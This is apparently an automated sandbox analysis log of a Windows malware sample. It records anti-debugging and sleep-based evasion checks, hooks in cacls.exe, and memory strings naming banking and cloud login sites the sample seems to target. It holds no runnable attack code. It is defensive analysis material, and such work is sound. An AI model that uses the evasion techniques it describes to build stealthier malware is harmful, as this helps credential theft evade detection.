File source: Process Memory Space: zAg7xx1vKI.exe PID: 1100, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FF8418CD324
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FF8418CD7E4
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FF8418CD944
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FF8418CD504
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FF8418CD544
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FF8418CD1E4
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FF8418D0154
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FF8418CDA44

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Memory allocated: E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Memory allocated: 4A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Memory allocated: 9150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Memory allocated: A150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Memory allocated: A370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Memory allocated: B370000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Code function: 3_2_010C096E rdtsc

3_2_010C096E

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe

Window / User API: threadDelayed 9732

Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\cacls.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe TID: 7240	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1404	Thread sleep count: 242 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1404	Thread sleep time: -484000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1404	Thread sleep count: 9732 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1404	Thread sleep time: -19464000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe TID: 6972	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cacls.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\cacls.exe

Code function: 6_2_0063C940 FindFirstFileW,FindNextFileW,FindClose,

6_2_0063C940

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: t577G2K6.6.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: t577G2K6.6.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: t577G2K6.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: t577G2K6.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: t577G2K6.6.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: t577G2K6.6.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: t577G2K6.6.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: t577G2K6.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: t577G2K6.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: t577G2K6.6.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: t577G2K6.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: t577G2K6.6.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: t577G2K6.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: t577G2K6.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: firefox.exe, 0000000B.00000002.2184448294.0000020D9AF8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllee,P
Source: cacls.exe, 00000006.00000002.2554437733.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, vMBXKWKIWTv.exe, 00000009.00000002.2555146728.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: t577G2K6.6.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: t577G2K6.6.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: t577G2K6.6.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: t577G2K6.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: t577G2K6.6.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: t577G2K6.6.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: t577G2K6.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: t577G2K6.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: t577G2K6.6.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: t577G2K6.6.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: t577G2K6.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: t577G2K6.6.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: t577G2K6.6.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: t577G2K6.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: t577G2K6.6.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: t577G2K6.6.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: t577G2K6.6.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Code function: 3_2_010C096E rdtsc

3_2_010C096E

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Code function: 3_2_00417E43 LdrLoadDll,

3_2_00417E43

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01140115 mov eax, dword ptr fs:[00000030h]	3_2_01140115
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112A118 mov ecx, dword ptr fs:[00000030h]	3_2_0112A118
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112A118 mov eax, dword ptr fs:[00000030h]	3_2_0112A118
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112A118 mov eax, dword ptr fs:[00000030h]	3_2_0112A118
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112A118 mov eax, dword ptr fs:[00000030h]	3_2_0112A118
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov eax, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov ecx, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov eax, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov eax, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov ecx, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov eax, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov eax, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov ecx, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov eax, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E10E mov ecx, dword ptr fs:[00000030h]	3_2_0112E10E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B0124 mov eax, dword ptr fs:[00000030h]	3_2_010B0124
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01118158 mov eax, dword ptr fs:[00000030h]	3_2_01118158
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107C156 mov eax, dword ptr fs:[00000030h]	3_2_0107C156
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01114144 mov eax, dword ptr fs:[00000030h]	3_2_01114144
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01114144 mov eax, dword ptr fs:[00000030h]	3_2_01114144
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01114144 mov ecx, dword ptr fs:[00000030h]	3_2_01114144
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01114144 mov eax, dword ptr fs:[00000030h]	3_2_01114144
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01114144 mov eax, dword ptr fs:[00000030h]	3_2_01114144
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086154 mov eax, dword ptr fs:[00000030h]	3_2_01086154
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086154 mov eax, dword ptr fs:[00000030h]	3_2_01086154
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C0185 mov eax, dword ptr fs:[00000030h]	3_2_010C0185
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110019F mov eax, dword ptr fs:[00000030h]	3_2_0110019F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110019F mov eax, dword ptr fs:[00000030h]	3_2_0110019F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110019F mov eax, dword ptr fs:[00000030h]	3_2_0110019F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110019F mov eax, dword ptr fs:[00000030h]	3_2_0110019F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107A197 mov eax, dword ptr fs:[00000030h]	3_2_0107A197
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107A197 mov eax, dword ptr fs:[00000030h]	3_2_0107A197
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107A197 mov eax, dword ptr fs:[00000030h]	3_2_0107A197
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01124180 mov eax, dword ptr fs:[00000030h]	3_2_01124180
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01124180 mov eax, dword ptr fs:[00000030h]	3_2_01124180
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113C188 mov eax, dword ptr fs:[00000030h]	3_2_0113C188
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113C188 mov eax, dword ptr fs:[00000030h]	3_2_0113C188
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011461C3 mov eax, dword ptr fs:[00000030h]	3_2_011461C3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011461C3 mov eax, dword ptr fs:[00000030h]	3_2_011461C3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE1D0 mov eax, dword ptr fs:[00000030h]	3_2_010FE1D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE1D0 mov eax, dword ptr fs:[00000030h]	3_2_010FE1D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_010FE1D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE1D0 mov eax, dword ptr fs:[00000030h]	3_2_010FE1D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE1D0 mov eax, dword ptr fs:[00000030h]	3_2_010FE1D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011561E5 mov eax, dword ptr fs:[00000030h]	3_2_011561E5
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B01F8 mov eax, dword ptr fs:[00000030h]	3_2_010B01F8
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01104000 mov ecx, dword ptr fs:[00000030h]	3_2_01104000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01122000 mov eax, dword ptr fs:[00000030h]	3_2_01122000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01122000 mov eax, dword ptr fs:[00000030h]	3_2_01122000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01122000 mov eax, dword ptr fs:[00000030h]	3_2_01122000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01122000 mov eax, dword ptr fs:[00000030h]	3_2_01122000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01122000 mov eax, dword ptr fs:[00000030h]	3_2_01122000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01122000 mov eax, dword ptr fs:[00000030h]	3_2_01122000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01122000 mov eax, dword ptr fs:[00000030h]	3_2_01122000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01122000 mov eax, dword ptr fs:[00000030h]	3_2_01122000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109E016 mov eax, dword ptr fs:[00000030h]	3_2_0109E016
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109E016 mov eax, dword ptr fs:[00000030h]	3_2_0109E016
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109E016 mov eax, dword ptr fs:[00000030h]	3_2_0109E016
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109E016 mov eax, dword ptr fs:[00000030h]	3_2_0109E016
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01116030 mov eax, dword ptr fs:[00000030h]	3_2_01116030
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107A020 mov eax, dword ptr fs:[00000030h]	3_2_0107A020
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107C020 mov eax, dword ptr fs:[00000030h]	3_2_0107C020
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01106050 mov eax, dword ptr fs:[00000030h]	3_2_01106050
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01082050 mov eax, dword ptr fs:[00000030h]	3_2_01082050
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AC073 mov eax, dword ptr fs:[00000030h]	3_2_010AC073
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108208A mov eax, dword ptr fs:[00000030h]	3_2_0108208A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011460B8 mov eax, dword ptr fs:[00000030h]	3_2_011460B8
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011460B8 mov ecx, dword ptr fs:[00000030h]	3_2_011460B8
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011180A8 mov eax, dword ptr fs:[00000030h]	3_2_011180A8
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011020DE mov eax, dword ptr fs:[00000030h]	3_2_011020DE
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010880E9 mov eax, dword ptr fs:[00000030h]	3_2_010880E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_0107A0E3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011060E0 mov eax, dword ptr fs:[00000030h]	3_2_011060E0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107C0F0 mov eax, dword ptr fs:[00000030h]	3_2_0107C0F0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C20F0 mov ecx, dword ptr fs:[00000030h]	3_2_010C20F0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA30B mov eax, dword ptr fs:[00000030h]	3_2_010BA30B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA30B mov eax, dword ptr fs:[00000030h]	3_2_010BA30B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA30B mov eax, dword ptr fs:[00000030h]	3_2_010BA30B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107C310 mov ecx, dword ptr fs:[00000030h]	3_2_0107C310
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A0310 mov ecx, dword ptr fs:[00000030h]	3_2_010A0310
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01128350 mov ecx, dword ptr fs:[00000030h]	3_2_01128350
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114A352 mov eax, dword ptr fs:[00000030h]	3_2_0114A352
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]	3_2_0110035C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]	3_2_0110035C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]	3_2_0110035C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110035C mov ecx, dword ptr fs:[00000030h]	3_2_0110035C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]	3_2_0110035C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]	3_2_0110035C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]	3_2_01102349
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112437C mov eax, dword ptr fs:[00000030h]	3_2_0112437C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A438F mov eax, dword ptr fs:[00000030h]	3_2_010A438F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A438F mov eax, dword ptr fs:[00000030h]	3_2_010A438F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107E388 mov eax, dword ptr fs:[00000030h]	3_2_0107E388
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107E388 mov eax, dword ptr fs:[00000030h]	3_2_0107E388
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107E388 mov eax, dword ptr fs:[00000030h]	3_2_0107E388
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01078397 mov eax, dword ptr fs:[00000030h]	3_2_01078397
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01078397 mov eax, dword ptr fs:[00000030h]	3_2_01078397
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01078397 mov eax, dword ptr fs:[00000030h]	3_2_01078397
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011243D4 mov eax, dword ptr fs:[00000030h]	3_2_011243D4
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011243D4 mov eax, dword ptr fs:[00000030h]	3_2_011243D4
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0108A3C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0108A3C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0108A3C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0108A3C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0108A3C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0108A3C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]	3_2_010883C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]	3_2_010883C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]	3_2_010883C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]	3_2_010883C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E3DB mov eax, dword ptr fs:[00000030h]	3_2_0112E3DB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E3DB mov eax, dword ptr fs:[00000030h]	3_2_0112E3DB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E3DB mov ecx, dword ptr fs:[00000030h]	3_2_0112E3DB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112E3DB mov eax, dword ptr fs:[00000030h]	3_2_0112E3DB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113C3CD mov eax, dword ptr fs:[00000030h]	3_2_0113C3CD
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]	3_2_010903E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]	3_2_010903E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]	3_2_010903E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]	3_2_010903E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]	3_2_010903E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]	3_2_010903E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]	3_2_010903E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]	3_2_010903E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B63FF mov eax, dword ptr fs:[00000030h]	3_2_010B63FF
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0109E3F0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0109E3F0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0109E3F0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107823B mov eax, dword ptr fs:[00000030h]	3_2_0107823B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113A250 mov eax, dword ptr fs:[00000030h]	3_2_0113A250
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113A250 mov eax, dword ptr fs:[00000030h]	3_2_0113A250
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086259 mov eax, dword ptr fs:[00000030h]	3_2_01086259
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01108243 mov eax, dword ptr fs:[00000030h]	3_2_01108243
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01108243 mov ecx, dword ptr fs:[00000030h]	3_2_01108243
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107A250 mov eax, dword ptr fs:[00000030h]	3_2_0107A250
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
